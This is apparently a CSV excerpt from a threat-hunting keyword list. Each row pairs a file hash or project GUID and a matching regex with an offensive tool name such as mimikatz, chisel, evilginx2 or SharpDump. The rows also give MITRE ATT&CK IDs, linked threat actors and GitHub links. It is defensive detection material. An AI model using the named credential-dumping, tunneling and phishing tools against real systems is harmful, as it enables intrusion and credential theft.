"*7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549*",".{0,1000}7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29463"
"*7a69936f724eb8af4e5a8052de3420c2359158ced63b66ae41fd6fe08c9542a8*",".{0,1000}7a69936f724eb8af4e5a8052de3420c2359158ced63b66ae41fd6fe08c9542a8.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29464"
"*7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81*",".{0,1000}7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29465"
"*7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49*",".{0,1000}7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29466"
"*7A6CEC00-4A6C-45E0-A25D-3CAB2F436EA6*",".{0,1000}7A6CEC00\-4A6C\-45E0\-A25D\-3CAB2F436EA6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29467"
"*7a71b37668cc866ca43cee0d1d0b51e35fca551c12648ebd2d1e44b021566d48*",".{0,1000}7a71b37668cc866ca43cee0d1d0b51e35fca551c12648ebd2d1e44b021566d48.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29469"
"*7a7f5dfc465ba190f6eb0cf36ada4e0dd90d6897c27cf4f6584472a95e828ecb*",".{0,1000}7a7f5dfc465ba190f6eb0cf36ada4e0dd90d6897c27cf4f6584472a95e828ecb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29477"
"*7A87DEAE-7B94-4986-9294-BD69B12A9732*",".{0,1000}7A87DEAE\-7B94\-4986\-9294\-BD69B12A9732.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#GUIDproject","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","29478"
"*7a8911925aadc8e4140a62e5467e01072148a5bb6c408fb083de934d3eb9bde0*",".{0,1000}7a8911925aadc8e4140a62e5467e01072148a5bb6c408fb083de934d3eb9bde0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29479"
"*7a8950ee0a99e8abc75e9b6dcf938acba9864b827b689a7617b584d24af90627*",".{0,1000}7a8950ee0a99e8abc75e9b6dcf938acba9864b827b689a7617b584d24af90627.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29480"
"*7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45*",".{0,1000}7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","#filehash","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","29481"
"*7a8cf5bea004a74703bea87fabc76475cd2931856b9ad55dbaf7a3682f91c725*",".{0,1000}7a8cf5bea004a74703bea87fabc76475cd2931856b9ad55dbaf7a3682f91c725.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","29482"
"*7a9171a7fe5be4b0676faad4c3f65124e0e2a73b79ec5b219da2204a64a3f3c7*",".{0,1000}7a9171a7fe5be4b0676faad4c3f65124e0e2a73b79ec5b219da2204a64a3f3c7.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","29483"
"*7a96ab7f25001fee0cfc74b67cc4d97016b073e0d924dc26a0bd90028825fbbd*",".{0,1000}7a96ab7f25001fee0cfc74b67cc4d97016b073e0d924dc26a0bd90028825fbbd.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","29484"
"*7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760*",".{0,1000}7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","29485"
"*7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1*",".{0,1000}7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","29488"
"*7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332*",".{0,1000}7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","#filehash","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","29489"
"*7aa3fb1f8adf702283d9de96a76ec3be0f4e6e1f0eb802f003a73f30f367122f*",".{0,1000}7aa3fb1f8adf702283d9de96a76ec3be0f4e6e1f0eb802f003a73f30f367122f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29490"
"*7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc*",".{0,1000}7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","29491"
"*7aa8e56e132d653609ccc17d76b630500443bc7b4b9a3eeba8359151d3db5961*",".{0,1000}7aa8e56e132d653609ccc17d76b630500443bc7b4b9a3eeba8359151d3db5961.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#filehash","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","29492"
"*7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67*",".{0,1000}7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29493"
"*7aac663ac8577e72ee771d1f4aee62c79a8454f3dc6b3838ca567bac23560e2a*",".{0,1000}7aac663ac8577e72ee771d1f4aee62c79a8454f3dc6b3838ca567bac23560e2a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29494"
"*7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718*",".{0,1000}7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29495"
"*7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef*",".{0,1000}7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29496"
"*7acb019f05541c2f8549a9d7250b5bb2c6cad5a795b73e874fbc0865fdb4719b*",".{0,1000}7acb019f05541c2f8549a9d7250b5bb2c6cad5a795b73e874fbc0865fdb4719b.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","29497"
"*7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22*",".{0,1000}7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29498"
"*7accd179e8a6b2fc907e7e8d087c52a7f48084852724b03d25bebcada1acbca5*",".{0,1000}7accd179e8a6b2fc907e7e8d087c52a7f48084852724b03d25bebcada1acbca5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29499"
"*7ad1f7ec564a2343ada204cfc7f8d903c7c7d623923bc5256551cc4d133d724f*",".{0,1000}7ad1f7ec564a2343ada204cfc7f8d903c7c7d623923bc5256551cc4d133d724f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29501"
"*7adf4cdaa2190d19969e9f2fe6315d586fd5b709466ef2c84379b8b3a595ffc8*",".{0,1000}7adf4cdaa2190d19969e9f2fe6315d586fd5b709466ef2c84379b8b3a595ffc8.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","29503"
"*7aee9dfce2969dec078595083f096c526ad4336795da50b5a0bc6e5741a1215e*",".{0,1000}7aee9dfce2969dec078595083f096c526ad4336795da50b5a0bc6e5741a1215e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29505"
"*7aeed302866656fbf84a03a45315c5b085ba45315b178732059e219a87f81644*",".{0,1000}7aeed302866656fbf84a03a45315c5b085ba45315b178732059e219a87f81644.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29506"
"*7af03cf989ce48137cd2b74c1020fc42241d7dea7ffaf6ff67f16a23a302ad80*",".{0,1000}7af03cf989ce48137cd2b74c1020fc42241d7dea7ffaf6ff67f16a23a302ad80.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","29507"
"*7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9*",".{0,1000}7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","#filehash","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","29508"
"*7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce*",".{0,1000}7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29509"
"*7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce*",".{0,1000}7afd2ebbf1c75880581e485fdd64d4b4cbb658a79cf271c0afa8092b8ce937ce.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","29510"
"*7afe06b8-59cc-41d2-9d75-65473ea93117*",".{0,1000}7afe06b8\-59cc\-41d2\-9d75\-65473ea93117.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","29511"
"*7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41*",".{0,1000}7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29512"
"*7b033c4458195e7b30ef1f85ceab1cb7cd67d6f37fda3d3ce5fb1e3520799fbd*",".{0,1000}7b033c4458195e7b30ef1f85ceab1cb7cd67d6f37fda3d3ce5fb1e3520799fbd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29513"
"*7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74*",".{0,1000}7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29514"
"*7b098959bdf3bc80d630a0a5eae9895c54f626a54f43848502ae3849152bd5f2*",".{0,1000}7b098959bdf3bc80d630a0a5eae9895c54f626a54f43848502ae3849152bd5f2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29515"
"*7b0e96b01da4d92b080da542be847cda9320ab3a3260f14c5360a3ceb86b2eb1*",".{0,1000}7b0e96b01da4d92b080da542be847cda9320ab3a3260f14c5360a3ceb86b2eb1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29517"
"*7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ*",".{0,1000}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","29518"
"*7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5*",".{0,1000}7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29519"
"*7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f*",".{0,1000}7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29520"
"*7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9*",".{0,1000}7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29521"
"*7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d*",".{0,1000}7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","29524"
"*7b399e28444f5bab4eb28f6c887e2eb0e5cef1e2b4c2ea8d51cae9ca5899deb1*",".{0,1000}7b399e28444f5bab4eb28f6c887e2eb0e5cef1e2b4c2ea8d51cae9ca5899deb1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29525"
